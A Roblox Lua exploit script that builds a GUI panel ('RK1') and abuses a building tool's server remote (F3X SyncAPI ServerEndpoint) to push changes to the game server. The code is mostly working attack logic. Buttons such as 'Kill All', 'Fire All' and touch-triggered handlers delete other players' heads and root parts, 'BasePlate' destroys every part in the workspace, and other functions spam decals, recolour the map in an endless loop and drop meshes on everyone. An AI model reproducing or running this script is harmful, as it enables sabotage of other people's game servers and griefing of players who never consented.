	-- Instances:

	local ReplicatedGui2023 = Instance.new("ScreenGui")
	local Rep = Instance.new("Frame")
	local Unanchor = Instance.new("TextButton")
	local StickAll = Instance.new("TextButton")
	local ThomasEngine = Instance.new("TextButton")
	local TwigAll = Instance.new("TextButton")
	local Personalityall = Instance.new("TextButton")
	local RainToad = Instance.new("TextButton")
	local SkyBox = Instance.new("TextButton")
	local Luigirain = Instance.new("TextButton")
	local Peircer = Instance.new("TextButton")
	local KillAll = Instance.new("TextButton")
	local FireParts = Instance.new("TextButton")
	local FireAll = Instance.new("TextButton")
	local Duckify = Instance.new("TextButton")
	local Colorall = Instance.new("TextButton")
	local DecalSpam = Instance.new("TextButton")
	local BumAll = Instance.new("TextButton")
	local BigHead = Instance.new("TextButton")
	local BasePlate = Instance.new("TextButton")
	local TextLabel = Instance.new("TextLabel")
	local MyButtons = Instance.new("Folder")
	local FakeAdmin = Instance.new("TextButton")
	local SlapPlayersToDeath = Instance.new("TextButton")
	local FakeSS = Instance.new("TextButton")
	local F3XReplicatedGui = Instance.new("TextButton")
	local Frame = Instance.new("Frame")
	local ImageLabel = Instance.new("ImageLabel")
	local TextLabel_2 = Instance.new("TextLabel")

	--Properties:
	for index, gui in pairs(game.CoreGui:children()) do if gui.Name == "ReplicatedGui2023" then gui:Destroy() end;end
	ReplicatedGui2023.Name = "ReplicatedGui2023"
	ReplicatedGui2023.Parent = game.CoreGui
	ReplicatedGui2023.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
	ReplicatedGui2023.ResetOnSpawn = false

	Rep.Name = "Rep"
	Rep.Parent = ReplicatedGui2023
	Rep.BackgroundColor3 = Color3.fromRGB(255, 100, 100)
	Rep.Position = UDim2.new(0.058192946, 0, 0.0895061716, 0)
	Rep.Size = UDim2.new(0, 414, 0, 345)
	Rep.Active = true
	Rep.Draggable = true

	Unanchor.Name = "Unanchor"
	Unanchor.Parent = Rep
	Unanchor.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Unanchor.Position = UDim2.new(0.23214066, 0, 0.332027137, 0)
	Unanchor.Size = UDim2.new(0, 89, 0, 37)
	Unanchor.Font = Enum.Font.Arial
	Unanchor.Text = "become monster"
	Unanchor.TextColor3 = Color3.fromRGB(90, 90, 90)
	Unanchor.TextSize = 14.000
	Unanchor.TextWrapped = true

	StickAll.Name = "Stick All"
	StickAll.Parent = Rep
	StickAll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	StickAll.Position = UDim2.new(0.663847744, 0, 0.439290822, 0)
	StickAll.Size = UDim2.new(0, 89, 0, 37)
	StickAll.Font = Enum.Font.Arial
	StickAll.Text = "SS Sword"
	StickAll.TextColor3 = Color3.fromRGB(90, 90, 90)
	StickAll.TextSize = 14.000
	StickAll.TextWrapped = true

	ThomasEngine.Name = "Thomas Engine"
	ThomasEngine.Parent = Rep
	ThomasEngine.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	ThomasEngine.Position = UDim2.new(0.669580102, 0, 0.105385453, 0)
	ThomasEngine.Size = UDim2.new(0, 89, 0, 37)
	ThomasEngine.Font = Enum.Font.Arial
	ThomasEngine.Text = "Thomas Engine"
	ThomasEngine.TextColor3 = Color3.fromRGB(90, 90, 90)
	ThomasEngine.TextSize = 14.000
	ThomasEngine.TextWrapped = true

	TwigAll.Name = "Twig All"
	TwigAll.Parent = Rep
	TwigAll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TwigAll.Position = UDim2.new(0.0144940615, 0, 0.558338404, 0)
	TwigAll.Size = UDim2.new(0, 89, 0, 37)
	TwigAll.Font = Enum.Font.Arial
	TwigAll.Text = "Rejoin"
	TwigAll.TextColor3 = Color3.fromRGB(90, 90, 90)
	TwigAll.TextSize = 14.000
	TwigAll.TextWrapped = true

	Personalityall.Name = "Personality all"
	Personalityall.Parent = Rep
	Personalityall.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Personalityall.Position = UDim2.new(0.447175264, 0, 0.441630304, 0)
	Personalityall.Size = UDim2.new(0, 89, 0, 37)
	Personalityall.Font = Enum.Font.Arial
	Personalityall.Text = "Personality all"
	Personalityall.TextColor3 = Color3.fromRGB(90, 90, 90)
	Personalityall.TextSize = 14.000
	Personalityall.TextWrapped = true

	RainToad.Name = "Rain Toad"
	RainToad.Parent = Rep
	RainToad.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	RainToad.Position = UDim2.new(0.447785497, 0, 0.218549386, 0)
	RainToad.Size = UDim2.new(0, 89, 0, 37)
	RainToad.Font = Enum.Font.Arial
	RainToad.Text = "Rain Toad"
	RainToad.TextColor3 = Color3.fromRGB(90, 90, 90)
	RainToad.TextSize = 14.000
	RainToad.TextWrapped = true

	SkyBox.Name = "SkyBox"
	SkyBox.Parent = Rep
	SkyBox.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	SkyBox.Position = UDim2.new(0.230138898, 0, 0.445008576, 0)
	SkyBox.Size = UDim2.new(0, 89, 0, 37)
	SkyBox.Font = Enum.Font.Arial
	SkyBox.Text = "SkyBox"
	SkyBox.TextColor3 = Color3.fromRGB(90, 90, 90)
	SkyBox.TextSize = 14.000
	SkyBox.TextWrapped = true

	Luigirain.Name = "Luigi rain"
	Luigirain.Parent = Rep
	Luigirain.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Luigirain.Position = UDim2.new(0.23226884, 0, 0.106453307, 0)
	Luigirain.Size = UDim2.new(0, 89, 0, 37)
	Luigirain.Font = Enum.Font.Arial
	Luigirain.Text = "Luigi rain"
	Luigirain.TextColor3 = Color3.fromRGB(90, 90, 90)
	Luigirain.TextSize = 14.000
	Luigirain.TextWrapped = true

	Peircer.Name = "Peircer"
	Peircer.Parent = Rep
	Peircer.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Peircer.Position = UDim2.new(0.0126849934, 0, 0.442363143, 0)
	Peircer.Size = UDim2.new(0, 89, 0, 37)
	Peircer.Font = Enum.Font.Arial
	Peircer.Text = "Peircer"
	Peircer.TextColor3 = Color3.fromRGB(90, 90, 90)
	Peircer.TextSize = 14.000
	Peircer.TextWrapped = true

	KillAll.Name = "Kill All"
	KillAll.Parent = Rep
	KillAll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	KillAll.Position = UDim2.new(0.683544278, 0, 0.332027137, 0)
	KillAll.Size = UDim2.new(0, 89, 0, 37)
	KillAll.Font = Enum.Font.Arial
	KillAll.Text = "Kill All"
	KillAll.TextColor3 = Color3.fromRGB(90, 90, 90)
	KillAll.TextSize = 14.000
	KillAll.TextWrapped = true

	FireParts.Name = "Fire Parts"
	FireParts.Parent = Rep
	FireParts.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	FireParts.Position = UDim2.new(0.229416311, 0, 0.553047419, 0)
	FireParts.Size = UDim2.new(0, 89, 0, 37)
	FireParts.Font = Enum.Font.Arial
	FireParts.Text = "Fire Parts"
	FireParts.TextColor3 = Color3.fromRGB(90, 90, 90)
	FireParts.TextSize = 14.000
	FireParts.TextWrapped = true

	FireAll.Name = "Fire All"
	FireAll.Parent = Rep
	FireAll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	FireAll.Position = UDim2.new(0.451852679, 0, 0.106453307, 0)
	FireAll.Size = UDim2.new(0, 89, 0, 37)
	FireAll.Font = Enum.Font.Arial
	FireAll.Text = "Fire All"
	FireAll.TextColor3 = Color3.fromRGB(90, 90, 90)
	FireAll.TextSize = 14.000
	FireAll.TextWrapped = true

	Duckify.Name = "Duckify"
	Duckify.Parent = Rep
	Duckify.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Duckify.Position = UDim2.new(0.0126849916, 0, 0.219142064, 0)
	Duckify.Size = UDim2.new(0, 89, 0, 37)
	Duckify.Font = Enum.Font.Arial
	Duckify.Text = "Duckify"
	Duckify.TextColor3 = Color3.fromRGB(90, 90, 90)
	Duckify.TextSize = 14.000
	Duckify.TextWrapped = true

	Colorall.Name = "Color all"
	Colorall.Parent = Rep
	Colorall.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Colorall.Position = UDim2.new(0.230138883, 0, 0.219142064, 0)
	Colorall.Size = UDim2.new(0, 89, 0, 37)
	Colorall.Font = Enum.Font.Arial
	Colorall.Text = "Color all"
	Colorall.TextColor3 = Color3.fromRGB(90, 90, 90)
	Colorall.TextSize = 14.000
	Colorall.TextWrapped = true

	DecalSpam.Name = "Decal Spam"
	DecalSpam.Parent = Rep
	DecalSpam.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	DecalSpam.Position = UDim2.new(0.0116572976, 0, 0.329825908, 0)
	DecalSpam.Size = UDim2.new(0, 89, 0, 37)
	DecalSpam.Font = Enum.Font.Arial
	DecalSpam.Text = "Decal Spam"
	DecalSpam.TextColor3 = Color3.fromRGB(90, 90, 90)
	DecalSpam.TextSize = 14.000
	DecalSpam.TextWrapped = true

	BumAll.Name = "Bum All"
	BumAll.Parent = Rep
	BumAll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	BumAll.Position = UDim2.new(0.669467688, 0, 0.218714803, 0)
	BumAll.Size = UDim2.new(0, 89, 0, 37)
	BumAll.Font = Enum.Font.Arial
	BumAll.Text = "Bum All"
	BumAll.TextColor3 = Color3.fromRGB(90, 90, 90)
	BumAll.TextSize = 14.000
	BumAll.TextWrapped = true

	BigHead.Name = "BigHead"
	BigHead.Parent = Rep
	BigHead.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	BigHead.Position = UDim2.new(0.0126849897, 0, 0.106453307, 0)
	BigHead.Size = UDim2.new(0, 89, 0, 37)
	BigHead.Font = Enum.Font.Arial
	BigHead.Text = "BigHead"
	BigHead.TextColor3 = Color3.fromRGB(90, 90, 90)
	BigHead.TextSize = 14.000
	BigHead.TextWrapped = true

	BasePlate.Name = "BasePlate"
	BasePlate.Parent = Rep
	BasePlate.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	BasePlate.Position = UDim2.new(0.451708734, 0, 0.329381645, 0)
	BasePlate.Size = UDim2.new(0, 89, 0, 37)
	BasePlate.Font = Enum.Font.Code
	BasePlate.Text = "BasePlate"
	BasePlate.TextColor3 = Color3.fromRGB(90, 90, 90)
	BasePlate.TextSize = 14.000
	BasePlate.TextWrapped = true

	TextLabel.Parent = Rep
	TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel.Size = UDim2.new(0, 414, 0, 25)
	TextLabel.Font = Enum.Font.SourceSans
	TextLabel.Text = "RK1"
	TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
	TextLabel.TextScaled = true
	TextLabel.TextSize = 14.000
	TextLabel.TextWrapped = true

	MyButtons.Name = "My Buttons"
	MyButtons.Parent = Rep

	FakeAdmin.Name = "Fake Admin"
	FakeAdmin.Parent = MyButtons
	FakeAdmin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	FakeAdmin.Position = UDim2.new(0.445061147, 0, 0.558338404, 0)
	FakeAdmin.Size = UDim2.new(0, 89, 0, 37)
	FakeAdmin.Font = Enum.Font.Arial
	FakeAdmin.Text = "Fake Admin"
	FakeAdmin.TextColor3 = Color3.fromRGB(90, 90, 90)
	FakeAdmin.TextSize = 14.000
	FakeAdmin.TextWrapped = true

	SlapPlayersToDeath.Name = "Slap Players To Death"
	SlapPlayersToDeath.Parent = MyButtons
	SlapPlayersToDeath.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	SlapPlayersToDeath.Position = UDim2.new(0.664934278, 0, 0.558338404, 0)
	SlapPlayersToDeath.Size = UDim2.new(0, 89, 0, 37)
	SlapPlayersToDeath.Font = Enum.Font.Arial
	SlapPlayersToDeath.Text = "Slap Players To Death"
	SlapPlayersToDeath.TextColor3 = Color3.fromRGB(90, 90, 90)
	SlapPlayersToDeath.TextSize = 14.000
	SlapPlayersToDeath.TextWrapped = true

	FakeSS.Name = "Fake SS"
	FakeSS.Parent = MyButtons
	FakeSS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	FakeSS.Position = UDim2.new(0.0116573274, 0, 0.672095001, 0)
	FakeSS.Size = UDim2.new(0, 89, 0, 37)
	FakeSS.Font = Enum.Font.Arial
	FakeSS.Text = "Blacklist"
	FakeSS.TextColor3 = Color3.fromRGB(90, 90, 90)
	FakeSS.TextSize = 14.000
	FakeSS.TextWrapped = true

	F3XReplicatedGui.Name = "F3X Replicated Gui"
	F3XReplicatedGui.Parent = MyButtons
	F3XReplicatedGui.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	F3XReplicatedGui.Position = UDim2.new(0.233644649, 0, 0.666804016, 0)
	F3XReplicatedGui.Size = UDim2.new(0, 89, 0, 37)
	F3XReplicatedGui.Font = Enum.Font.Arial
	F3XReplicatedGui.Text = "Whitelist"
	F3XReplicatedGui.TextColor3 = Color3.fromRGB(90, 90, 90)
	F3XReplicatedGui.TextSize = 14.000
	F3XReplicatedGui.TextWrapped = true

	Frame.Parent = ReplicatedGui2023
	Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Frame.BackgroundTransparency = 1.000
	Frame.Position = UDim2.new(0, 0, 0.79919678, 0)
	Frame.Size = UDim2.new(0, 267, 0, 100)

	ImageLabel.Parent = Frame
	ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	ImageLabel.BorderColor3 = Color3.fromRGB(27, 27, 27)
	ImageLabel.BorderSizePixel = 2
	ImageLabel.Position = UDim2.new(0.0337078571, 0, 0.227877513, 0)
	ImageLabel.Size = UDim2.new(0, 50, 0, 54)
	ImageLabel.Image = "rbxassetid://1027618970"

	TextLabel_2.Parent = Frame
	TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_2.BorderColor3 = Color3.fromRGB(0, 60, 255)
	TextLabel_2.BorderSizePixel = 2
	TextLabel_2.Position = UDim2.new(0.258426964, 0, 0.25999999, 0)
	TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
	TextLabel_2.Font = Enum.Font.Code
	TextLabel_2.Text = "We have replicated ur client to server.\nDiscord acc: hmmmmmm#5824"
	TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
	TextLabel_2.TextScaled = true
	TextLabel_2.TextSize = 14.000
	TextLabel_2.TextWrapped = true

	-- Scripts:

	local function FBING_fake_script() -- Rep.LocalScript 
		local script = Instance.new('LocalScript', Rep)

		--rgrg
		local player = game.Players.LocalPlayer
		local char = player.Character
		spawn(function()
			while wait(0.1) do
				char = player.Character or player.CharacterAdded:Wait()
			end
		end)
		local tool;
		local my_buttons=script.Parent["My Buttons"]
		my_buttons["F3X Replicated Gui"].MouseButton1Click:Connect(function()
			for i,v in player:GetDescendants() do
				if v.Name == "SyncAPI" then
					tool = v.Parent
				end
			end
			for i,v in game.ReplicatedStorage:GetDescendants() do
				if v.Name == "SyncAPI" then
					tool = v.Parent
				end
			end
			wait(0.5)if tool ~= nil then
				my_buttons["F3X Replicated Gui"].Text = "Whitelisted"
				repeat wait(0.7) until tool == nil
				my_buttons["F3X Replicated Gui"].Text = "Blacklisted"
				wait(1)
				my_buttons["F3X Replicated Gui"].Text = "Whitelist"
			else
				my_buttons["F3X Replicated Gui"].Text = "Failed"
			end
		end)
		repeat wait(0.1) until tool ~= nil
		--craaa
		remote = tool.SyncAPI.ServerEndpoint
		function _(args)
			args = (args);
			tool = (tool);
			remote = tool:WaitForChild("SyncAPI"):WaitForChild("ServerEndpoint")
			remote:InvokeServer(unpack(args))
		end;function SetCollision(part,boolean)
			local args = {
				[1] = "SyncCollision",
				[2] = {
					[1] = {
						["Part"] = part,
						["CanCollide"] = boolean
					}
				}
			}
			_(args)
		end;function SetAnchor(boolean,part)
			local args = {
				[1] = "SyncAnchor",
				[2] = {
					[1] = {
						["Part"] = part,
						["Anchored"] = boolean
					}
				}
			}
			_(args)
		end;function CreatePart(cf,parent)
			local args = {
				[1] = "CreatePart",
				[2] = "Normal",
				[3] = cf,
				[4] = parent
			}
			_(args)
		end;function DestroyPart(part)
			local args = {
				[1] = "Remove",
				[2] = {
					[1] = part
				}
			}
			_(args)
		end;function MovePart(part,cf)
			local args = {
				[1] = "SyncMove",
				[2] = {
					[1] = {
						["Part"] = part,
						["CFrame"] = cf
					}
				}
			}
			_(args)
		end;function Resize(part,size,cf)
			local args = {
				[1] = "SyncResize",
				[2] = {
					[1] = {
						["Part"] = part,
						["CFrame"] = cf,
						["Size"] = size
					}
				}
			}
			_(args)
		end;function AddMesh(part)
			local args = {
				[1] = "CreateMeshes",
				[2] = {
					[1] = {
						["Part"] = part
					}
				}
			}
			_(args)
		end;function SetMesh(part,meshid)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["MeshId"] = "rbxassetid://"..meshid
					}
				}
			}
			_(args)
		end;function SetTexture(part, texid)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["TextureId"] = "rbxassetid://"..texid
					}
				}
			}
			_(args)
		end;function SetName(part, stringg)
			local args = {
				[1] = "SetName",
				[2] = {
					[1] = part
				},
				[3] = stringg
			}

			_(args)
		end;function MeshResize(part,size)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["Scale"] = size
					}
				}
			}
			_(args)
		end;function Weld(part1, part2,lead)
			local args = {
				[1] = "CreateWelds",
				[2] = {
					[1] = part1,
					[2] = part2
				},
				[3] = lead
			}
			_(args)

		end;function SetLocked(part,boolean)
			local args = {
				[1] = "SetLocked",
				[2] = {
					[1] = part
				},
				[3] = boolean
			}
			_(args)
		end;function SetTrans(part,int)
			local args = {
				[1] = "SyncMaterial",
				[2] = {
					[1] = {
						["Part"] = part,
						["Transparency"] = int
					}
				}
			}
			_(args)
		end;function CreateSpotlight(part)
			local args = {
				[1] = "CreateLights",
				[2] = {
					[1] = {
						["Part"] = part,
						["LightType"] = "SpotLight"
					}
				}
			}
			_(args)
		end;function SyncLighting(part,brightness)
			local args = {
				[1] = "SyncLighting",
				[2] = {
					[1] = {
						["Part"] = part,
						["LightType"] = "SpotLight",
						["Brightness"] = brightness
					}
				}
			}
			_(args)
		end;function Color(part,color)
			local args = {
				[1] = "SyncColor",
				[2] = {
					[1] = {
						["Part"] = part,
						["Color"] = color --[[Color3]],
						["UnionColoring"] = false
					}
				}
			}
			_(args)
		end;function SpawnDecal(part,side)
			local args = {
				[1] = "CreateTextures",
				[2] = {
					[1] = {
						["Part"] = part,
						["Face"] = side,
						["TextureType"] = "Decal"
					}
				}
			}

			_(args)
		end;function AddDecal(part,asset,side)
			local args = {
				[1] = "SyncTexture",
				[2] = {
					[1] = {
						["Part"] = part,
						["Face"] = side,
						["TextureType"] = "Decal",
						["Texture"] = "rbxassetid://".. asset
					}
				}
			}
			_(args)end;function Material(part,mate)

			local args = {
				[1] = "SyncMaterial",
				[2] = {
					[1] = {
						["Part"] = part,
						["Material"] = mate
					}
				}
			}
			_(args)
		end

		script.Parent.BigHead.MouseButton1Click:Connect(function()
			local function BigHead(player)
				local chara = player.Character
				spawn(function()
					SetLocked(chara.Head,false)
					MeshResize(chara.Head,Vector3.new(10,10,10))
				end)
			end
			for i,players in game.Players:GetPlayers() do
				BigHead(players)
			end
		end)
		script.Parent["Bum All"].MouseButton1Click:Connect(function()
			local function Bum(player)
				char = player.Character
				for i,v in char:GetChildren() do
					pcall(function()
						SetLocked(v,false)
					end)
				end
				if player.Character:FindFirstChild("Part1") then
					return
				else

					SetAnchor(true,player.Character.HumanoidRootPart)
					spawn(function()
						CreatePart(player.Character:WaitForChild("Right Leg").CFrame * CFrame.new(0,1,0.6),player.Character)
						SetName(player.Character.Part,"Part1")
						CreatePart(player.Character:WaitForChild("Left Leg").CFrame * CFrame.new(0,1,0.6),player.Character)
						SetName(player.Character.Part,"Part2")
					end)
					wait(0.2)
					repeat wait() until char:FindFirstChild("Part2")
					spawn(function()
						AddMesh(char.Part1)
						AddMesh(char.Part2)
						SetMesh(char.Part1,"5697933202")
						SetMesh(char.Part2,"5697933202")
					end)
					wait(0.2)
					repeat wait() until char.Part2:FindFirstChild("Mesh")
					spawn(function()
						MeshResize(char.Part1,Vector3.new(0.5,0.5,0.5))
						MeshResize(char.Part2,Vector3.new(0.5,0.5,0.5))
					end)
					wait(0.2)
					pcall(function()
						Color(char.Part1,char:WaitForChild("Right Leg").Color)
						Color(char.Part2,char:WaitForChild("Left Leg").Color)
					end)
					wait(0.2)
					spawn(function()
						SetCollision(player.Character.Part1,false)
						SetCollision(player.Character.Part2,false)
						Weld(char.Part1,char.HumanoidRootPart,char.Part1)
						Weld(char.Part2,char.Part1,char.Part2)
					end)
					repeat wait() until char.Part2:FindFirstChild("BTWeld")
					spawn(function()
						SetAnchor(false,char.HumanoidRootPart)
						SetAnchor(false,char.Part1)
						SetAnchor(false,char.Part2)
					end)
					repeat wait()
						SetAnchor(false,char.HumanoidRootPart)
						SetAnchor(false,char.Part1)
						SetAnchor(false,char.Part2)
					until char.Part2.Anchored == false
				end
			end
			for i,v in game.Players:GetPlayers() do
				--zzspawn(function()
				pcall(function()
					Bum(v)
				end)
				--end)
			end
		end)
		script.Parent["Color all"].MouseButton1Click:Connect(function()
			local function randomise()
				for i,v in game.Workspace:GetDescendants() do
					if v:IsA("BasePart") then
						spawn(function()
							SetLocked(v,false)
							Color(v,Color3.new(math.random(0,255),math.random(0,255),math.random(0,255)))
						end)
					end
				end
			end
			while wait() do
				spawn(function()
					randomise()
				end)
			end
		end)
		script.Parent["Decal Spam"].MouseButton1Click:Connect(function()
			local function spam(id)
				for i,v in game.workspace:GetDescendants() do
					if v:IsA("BasePart") then
						spawn(function()
							SetLocked(v,false)
							SpawnDecal(v,Enum.NormalId.Front)
							AddDecal(v,id,Enum.NormalId.Front)

							SpawnDecal(v,Enum.NormalId.Back)
							AddDecal(v,id,Enum.NormalId.Back)

							SpawnDecal(v,Enum.NormalId.Right)
							AddDecal(v,id,Enum.NormalId.Right)

							SpawnDecal(v,Enum.NormalId.Left)
							AddDecal(v,id,Enum.NormalId.Left)

							SpawnDecal(v,Enum.NormalId.Bottom)
							AddDecal(v,id,Enum.NormalId.Bottom)

							SpawnDecal(v,Enum.NormalId.Top)
							AddDecal(v,id,Enum.NormalId.Top)
						end)
					end
				end 
			end
			spam("8126977748")
		end)
		script.Parent.Duckify.MouseButton1Click:Connect(function()
			local function Duckify(player)
				for i,v in player.Character:GetDescendants() do
					if v:IsA("BasePart") then
						pcall(function()
							SetLocked(v,false)
							SetTrans(v,1)
						end)
					end
				end
				char = player.Character
				--spawn(function()
				spawn(function()
					SetAnchor(true,char.HumanoidRootPart)
					CreatePart(char.HumanoidRootPart.CFrame,char)
					SetCollision(char.Part,false)
					SetName(char.Part, "Duck")
				end)
				repeat wait() until char:FindFirstChild("Duck")
				spawn(function()
					SetLocked(char.Duck,false)
					SetLocked(char.HumanoidRootPart,false)
					Weld(char.Duck,char.HumanoidRootPart,char.Duck)
					SetAnchor(false,char.Duck)
					AddMesh(char.Duck)
				end)
				repeat wait() until char.Duck:FindFirstChild("Mesh")
				MeshResize(char.Duck,Vector3.new(8,8,8))
				SetMesh(char.Duck,"10749878672")
				SetTexture(char.Duck,"10749878886")
				SetAnchor(false,char.HumanoidRootPart)
				--end)
			end
			for i,v in game.Players:GetPlayers() do
				--spawn(function()
				Duckify(v)
				--end)
			end
		end)
		function AddFire(part)
			local args = {
				[1] = "CreateDecorations",
				[2] = {
					[1] = {
						["Part"] = part,
						["DecorationType"] = "Fire"
					}
				}
			}
			_(args)
		end
		script.Parent["Fire All"].MouseButton1Click:Connect(function()
			local function Fire(player)
				for i,v in player.Character:GetDescendants() do
					if v:IsA("BasePart") then
						AddFire(v)
					end
				end
				DestroyPart(player.Character.Head)
			end

			for i,v in game.Players:GetPlayers() do
				spawn(function()
					pcall(function()
						Fire(v)
					end)
				end)
			end
		end)
		script.Parent["Luigi rain"].MouseButton1Click:Connect(function()
			spawn(function()
				local hrpcf = player.Character.HumanoidRootPart.CFrame
				local x = hrpcf.x
				local z = hrpcf.z
				local randint = math.random(-600,600)
				local randint2 = math.random(-600,600)
				local xloc = randint + x
				local zloc = randint2 + z
				local cf = player.Character.HumanoidRootPart.CFrame.y + 400
				while wait(0.5) do
					x = hrpcf.x
					z = hrpcf.z
					randint = math.random(-600,600)
					randint2 = math.random(-600,600)
					xloc = randint + x
					zloc = randint2 + z
					cf = player.Character.HumanoidRootPart.CFrame.y + 400
					spawn(function()
						CreatePart(CFrame.new(math.floor(xloc), math.random(cf,cf+400), math.floor(zloc)), workspace)
						for i,v in game.Workspace:GetDescendants() do
							if v.Name == "Part" and v.Parent == workspace and v.CFrame.x == math.floor(xloc) and v.CFrame.z == math.floor(zloc) then
								SetName(v,"luigi")
								SetAnchor(false,v)
								AddMesh(v)
								Resize(v, Vector3.new(100,100,100),v.CFrame)
								MeshResize(v,Vector3.new(20,20,20))
								SetMesh(v,"1618237875")
								SetTexture(v, "1618237897")
								SetCollision(v,false)
							else
							end
						end
					end)
				end
			end)
		end)
		script.Parent["Rain Toad"].MouseButton1Click:Connect(function()
			spawn(function()
				local hrpcf = player.Character.HumanoidRootPart.CFrame
				local x = hrpcf.x
				local z = hrpcf.z
				local randint = math.random(-600,600)
				local randint2 = math.random(-600,600)
				local xloc = randint + x
				local zloc = randint2 + z
				local cf = player.Character.HumanoidRootPart.CFrame.y + 400
				while wait(0.5) do
					x = hrpcf.x
					z = hrpcf.z
					randint = math.random(-600,600)
					randint2 = math.random(-600,600)
					xloc = randint + x
					zloc = randint2 + z
					cf = player.Character.HumanoidRootPart.CFrame.y + 400
					spawn(function()
						CreatePart(CFrame.new(math.floor(xloc), math.random(cf,cf+400), math.floor(zloc)),workspace)
						for i,v in game.Workspace:GetDescendants() do
							if v.Name == "Part" and v.Parent == workspace and v.CFrame.x == math.floor(xloc) and v.CFrame.z == math.floor(zloc) then
								SetName(v,"toadei")
								SetAnchor(false,v)
								AddMesh(v)
								Resize(v, Vector3.new(100,100,100),v.CFrame)
								MeshResize(v,Vector3.new(3,3,3))
								SetMesh(v,"614605299")
								SetTexture(v, "614605300")
								SetCollision(v,false)
							else
							end
						end	
					end)
				end
			end)
		end)
		script.Parent["Thomas Engine"].MouseButton1Click:Connect(function()
			local function Thomas(player)
				SetAnchor(true,char.HumanoidRootPart)
				CreatePart(char.HumanoidRootPart.CFrame,char)
				SetCollision(char.Part,false)
				SetLocked(char.Part,false)
				CreateSpotlight(char.Part)
				SyncLighting(char.Part,100)
				SetLocked(char.HumanoidRootPart,false)
				Weld(char.Part,char.HumanoidRootPart,char.Part)
				SetAnchor(false,char.Part)
				AddMesh(char.Part)
				MeshResize(char.Part,Vector3.new(3,3,3))
				SetMesh(char.Part,"4340968808")
				SetTexture(char.Part,"4340968918")
				SetAnchor(false,char.HumanoidRootPart)
				char.Humanoid.WalkSpeed = 100
				char.HumanoidRootPart.Touched:connect(function(obj)
					if obj.Parent:FindFirstChild("Humanoid") then
						SetLocked(obj.Parent.Head,false)
						DestroyPart(obj.Parent.Head)
						SetLocked(obj.Parent.HumanoidRootPart,false)
						DestroyPart(obj.Parent.HumanoidRootPart)
						char.Humanoid.WalkSpeed = 100
					end
				end)
			end
			Thomas(player)
		end)
		script.Parent.Unanchor.MouseButton1Click:Connect(function()
			local function monsterSpawn(player)
				SetAnchor(true,char.HumanoidRootPart)
				CreatePart(char.HumanoidRootPart.CFrame,char)
				SetCollision(char.Part,false)
				SetLocked(char.Part,false)
				local monid = "13896708828"
				SpawnDecal(char.Part,Enum.NormalId.Front)
				AddDecal(char.Part,monid,Enum.NormalId.Front)
				SpawnDecal(char.Part,Enum.NormalId.Back)
				AddDecal(char.Part,monid,Enum.NormalId.Back)
				Resize(char.Part, Vector3.new(6.2,6.2,6.2),char.Part.CFrame)
				--SetTrans(char.Part,0)
				for i, v in pairs(char:GetDescendants()) do
					if v:IsA("BasePart") or v:IsA("Part") then
						SetTrans(v,1)
					end
				end
				SetLocked(char.HumanoidRootPart,false)
				Weld(char.Part,char.HumanoidRootPart,char.Part)
				SetAnchor(false,char.Part)
				char.Part.CanCollide = false
				--AddMesh(char.Part)
				--MeshResize(char.Part,Vector3.new(3,3,3))
				--SetMesh(char.Part,"4340968808")
				--SetTexture(char.Part,"4340968918")
				SetAnchor(false,char.HumanoidRootPart)
				char.Humanoid.WalkSpeed = 35
				char.Part.Touched:connect(function(obj)
					if obj.Parent:FindFirstChild("Humanoid") then
						SetLocked(obj.Parent.Head,false)
						DestroyPart(obj.Parent.Head)
						SetLocked(obj.Parent.HumanoidRootPart,false)
						DestroyPart(obj.Parent.HumanoidRootPart)
						char.Humanoid.WalkSpeed = 100
					end
				end)
				char.Part.Name = "ThomasPart"
			end
			monsterSpawn(player)
		end)
		script.Parent.BasePlate.MouseButton1Click:Connect(function()
			local hrpx = math.floor(char.HumanoidRootPart.CFrame.x)
			local hrpz = math.floor(char.HumanoidRootPart.CFrame.z)
			local hrpy = math.floor(char.HumanoidRootPart.CFrame.y)
			local function SpawnBasePlate()
				for i, v in pairs(workspace:GetDescendants()) do
					if v:IsA("BasePart") or v:IsA("Part") then
						DestroyPart(v)
					end
				end
				CreatePart(CFrame.new(hrpx,hrpy-20,hrpz),workspace,"Spawn")
				for i,v in game.Workspace:GetChildren() do
					if v:IsA("BasePart") and v.CFrame.y == hrpy - 20 and v.CFrame.x == hrpx then
						spawn(function()
							Resize(v,Vector3.new(1000,3,1000),CFrame.new(hrpx,hrpy-20,hrpz))
							Material(v,Enum.Material.Grass)
							Color(v,Color3.fromRGB(25,100,25))
							while wait(1) do
								pcall(function()SetLocked(v,true)end)
							end
						end)
					end
				end
			end
			SpawnBasePlate()
		end)
